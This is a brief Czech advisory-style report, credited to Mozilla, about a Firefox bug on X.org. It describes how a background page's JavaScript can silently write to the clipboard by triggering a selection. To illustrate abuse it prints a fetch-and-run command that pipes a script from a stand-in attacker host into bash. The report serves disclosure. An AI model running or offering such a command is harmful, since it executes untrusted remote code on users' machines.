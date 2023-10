Autor: Mozilla

Bylo objeveno, že ve Firefoxu běžícím na X.org (a možná i dalších grafických rozhraních) může JavaScript ve stránce, i když je stránka v nevybraném panelu a prohlížeč je na pozadí, zapisovat do schránky libovolné hodnoty.





Potenciální zneužití může vypadat tak, že stránka po náhodné době vloží do schránky příkaz typu:





curl https://útočník/ | bash \r



Pak doufá, že uživatel zrovna kopíruje nějaké věci do terminálu (případně editoru jako Vim s příkazovým režimem atd.) a toto tam vloží místo toho, co opravdu vložit chce. Protože stránka může s vložením do schránky počkat, nefungují běžné obrany se „sanitizací“ obsahu schránky po přepnutí z webového prohlížeče do jiné aplikace.

Interně trik funguje tak, že JavaScript vyvolá vybrání nějakého prvku. V X.org a podobných rozhraních je běžné, že se výběr automaticky zkopíruje do schránky. Můžete se podívat na demonstraci principu.